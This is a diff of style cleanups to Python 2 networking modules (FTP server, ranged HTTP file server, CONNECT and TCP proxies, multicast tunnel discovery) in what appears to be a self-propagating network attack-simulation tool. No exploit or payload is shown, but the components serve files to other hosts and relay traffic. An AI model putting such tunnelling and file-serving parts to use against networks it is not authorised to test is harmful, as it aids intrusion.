@ -71,7 +75,7 @@ class FTPServer(threading.Thread):
if self.pasv_mode: if self.pasv_mode:
self.servsock.close() self.servsock.close()
self.pasv_mode = False self.pasv_mode = False
l=cmd[5:].split(',') l = cmd[5:].split(',')
self.dataAddr='.'.join(l[:4]) self.dataAddr='.'.join(l[:4])
self.dataPort=(int(l[4])<<8)+int(l[5]) self.dataPort=(int(l[4])<<8)+int(l[5])
self.conn.send('200 Get port.\r\n') self.conn.send('200 Get port.\r\n')
@ -97,7 +101,6 @@ class FTPServer(threading.Thread):
if self.pasv_mode: if self.pasv_mode:
self.servsock.close() self.servsock.close()
def LIST(self,cmd): def LIST(self,cmd):
self.conn.send('150 Here comes the directory listing.\r\n') self.conn.send('150 Here comes the directory listing.\r\n')
self.start_datasock() self.start_datasock()
@ -109,8 +112,8 @@ class FTPServer(threading.Thread):
def toListItem(self,fn): def toListItem(self,fn):
fullmode='rwxrwxrwx' fullmode='rwxrwxrwx'
mode='' mode = ''
d='-' d = '-'
ftime=time.strftime(' %b %d %H:%M ', time.gmtime()) ftime=time.strftime(' %b %d %H:%M ', time.gmtime())
return d+fullmode+' 1 user group '+str(self.files[fn].tell())+ftime+fn return d+fullmode+' 1 user group '+str(self.files[fn].tell())+ftime+fn

22
chaos_monkey/transport/http.py
View File

@ -1,6 +1,4 @@
import urllib, BaseHTTPServer, threading, os.path import urllib, BaseHTTPServer, threading, os.path
import shutil
import struct
import monkeyfs import monkeyfs
from logging import getLogger from logging import getLogger
from base import TransportProxyBase from base import TransportProxyBase
@ -12,6 +10,7 @@ __author__ = 'hoffer'
LOG = getLogger(__name__) LOG = getLogger(__name__)
class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1" protocol_version = "HTTP/1.1"
filename = "" filename = ""
@ -23,8 +22,8 @@ class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def report_download(): def report_download():
pass pass
def do_POST (self): def do_POST(self):
self.send_error (501, "Unsupported method (POST)") self.send_error(501, "Unsupported method (POST)")
return return
def do_GET(self): def do_GET(self):
@ -45,7 +44,7 @@ class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
start_range += chunk start_range += chunk
if f.tell() == monkeyfs.getsize(self.filename): if f.tell() == monkeyfs.getsize(self.filename):
self.report_download() self.report_download()
f.close() f.close()
@ -64,7 +63,7 @@ class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
f = monkeyfs.open(self.filename, 'rb') f = monkeyfs.open(self.filename, 'rb')
except IOError: except IOError:
self.send_error(404, "File not found") self.send_error(404, "File not found")
return (None, 0, 0) return None, 0, 0
size = monkeyfs.getsize(self.filename) size = monkeyfs.getsize(self.filename)
start_range = 0 start_range = 0
end_range = size end_range = size
@ -93,12 +92,12 @@ class FileServHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
self.send_header("Content-Range", 'bytes ' + str(start_range) + '-' + str(end_range - 1) + '/' + str(size)) self.send_header("Content-Range", 'bytes ' + str(start_range) + '-' + str(end_range - 1) + '/' + str(size))
self.send_header("Content-Length", min(end_range - start_range, size)) self.send_header("Content-Length", min(end_range - start_range, size))
self.end_headers() self.end_headers()
return (f, start_range, end_range) return f, start_range, end_range
def log_message(self, format, *args): def log_message(self, format, *args):
LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(), LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(),
self.log_date_time_string(), self.log_date_time_string(),
format % args)) format % args))
class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler): class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
@ -146,6 +145,7 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
self.log_date_time_string(), self.log_date_time_string(),
format % args)) format % args))
class InternalHTTPServer(BaseHTTPServer.HTTPServer): class InternalHTTPServer(BaseHTTPServer.HTTPServer):
def handle_error(self, request, client_address): def handle_error(self, request, client_address):
#ToDo: debug log error #ToDo: debug log error
@ -157,6 +157,7 @@ class InternalHTTPServer(BaseHTTPServer.HTTPServer):
# print >>sys.stderr, '-'*40 # print >>sys.stderr, '-'*40
pass pass
class HTTPServer(threading.Thread): class HTTPServer(threading.Thread):
def __init__(self, local_ip, local_port, filename, max_downloads=1): def __init__(self, local_ip, local_port, filename, max_downloads=1):
self._local_ip = local_ip self._local_ip = local_ip
@ -172,7 +173,7 @@ class HTTPServer(threading.Thread):
filename = self._filename filename = self._filename
@staticmethod @staticmethod
def report_download(): def report_download():
self.downloads+=1 self.downloads += 1
httpd = InternalHTTPServer((self._local_ip, self._local_port), TempHandler) httpd = InternalHTTPServer((self._local_ip, self._local_port), TempHandler)
httpd.timeout = 0.5 httpd.timeout = 0.5
@ -186,6 +187,7 @@ class HTTPServer(threading.Thread):
self._stopped = True self._stopped = True
self.join(timeout) self.join(timeout)
class HTTPConnectProxy(TransportProxyBase): class HTTPConnectProxy(TransportProxyBase):
def run(self): def run(self):
httpd = InternalHTTPServer((self.local_host, self.local_port), HTTPConnectProxyHandler) httpd = InternalHTTPServer((self.local_host, self.local_port), HTTPConnectProxyHandler)

6
chaos_monkey/transport/tcp.py
View File

@ -1,7 +1,5 @@
import sys
import socket import socket
import select import select
import time
from threading import Thread from threading import Thread
from base import TransportProxyBase from base import TransportProxyBase
from logging import getLogger from logging import getLogger
@ -11,9 +9,10 @@ DEFAULT_TIMEOUT = 10
LOG = getLogger(__name__) LOG = getLogger(__name__)
class SocketsPipe(Thread): class SocketsPipe(Thread):
def __init__(self, source, dest, timeout=DEFAULT_TIMEOUT): def __init__(self, source, dest, timeout=DEFAULT_TIMEOUT):
Thread.__init__( self ) Thread.__init__(self)
self.source = source self.source = source
self.dest = dest self.dest = dest
self.timeout = timeout self.timeout = timeout
@ -44,6 +43,7 @@ class SocketsPipe(Thread):
self.source.close() self.source.close()
self.dest.close() self.dest.close()
class TcpProxy(TransportProxyBase): class TcpProxy(TransportProxyBase):
def run(self): def run(self):

13
chaos_monkey/tunnel.py
View File

@ -17,7 +17,8 @@ MCAST_GROUP = '224.1.1.1'
MCAST_PORT = 5007 MCAST_PORT = 5007
BUFFER_READ = 1024 BUFFER_READ = 1024
DEFAULT_TIMEOUT = 10 DEFAULT_TIMEOUT = 10
QUIT_TIMEOUT = 1200 #20 minutes QUIT_TIMEOUT = 1200 # 20 minutes
def _set_multicast_socket(timeout=DEFAULT_TIMEOUT): def _set_multicast_socket(timeout=DEFAULT_TIMEOUT):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
@ -25,8 +26,8 @@ def _set_multicast_socket(timeout=DEFAULT_TIMEOUT):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', MCAST_PORT)) sock.bind(('', MCAST_PORT))
sock.setsockopt(socket.IPPROTO_IP, sock.setsockopt(socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP, socket.IP_ADD_MEMBERSHIP,
struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY)) struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY))
return sock return sock
@ -64,13 +65,14 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT):
sock.sendto("+", (address, MCAST_PORT)) sock.sendto("+", (address, MCAST_PORT))
sock.close() sock.close()
return (address, port) return address, port
except Exception, exc: except Exception, exc:
LOG.debug("Caught exception in tunnel lookup: %s", exc) LOG.debug("Caught exception in tunnel lookup: %s", exc)
continue continue
return None return None
def quit_tunnel(address, timeout=DEFAULT_TIMEOUT): def quit_tunnel(address, timeout=DEFAULT_TIMEOUT):
try: try:
sock = _set_multicast_socket(timeout) sock = _set_multicast_socket(timeout)
@ -94,12 +96,11 @@ class MonkeyTunnel(Thread):
self.local_port = None self.local_port = None
super(MonkeyTunnel, self).__init__() super(MonkeyTunnel, self).__init__()
self.daemon = True self.daemon = True
self.l_ips = None
def run(self): def run(self):
self._broad_sock = _set_multicast_socket(self._timeout) self._broad_sock = _set_multicast_socket(self._timeout)
self.l_ips = local_ips() self.l_ips = local_ips()
self.local_port = get_free_tcp_port() self.local_port = get_free_tcp_port()
if not self.local_port: if not self.local_port: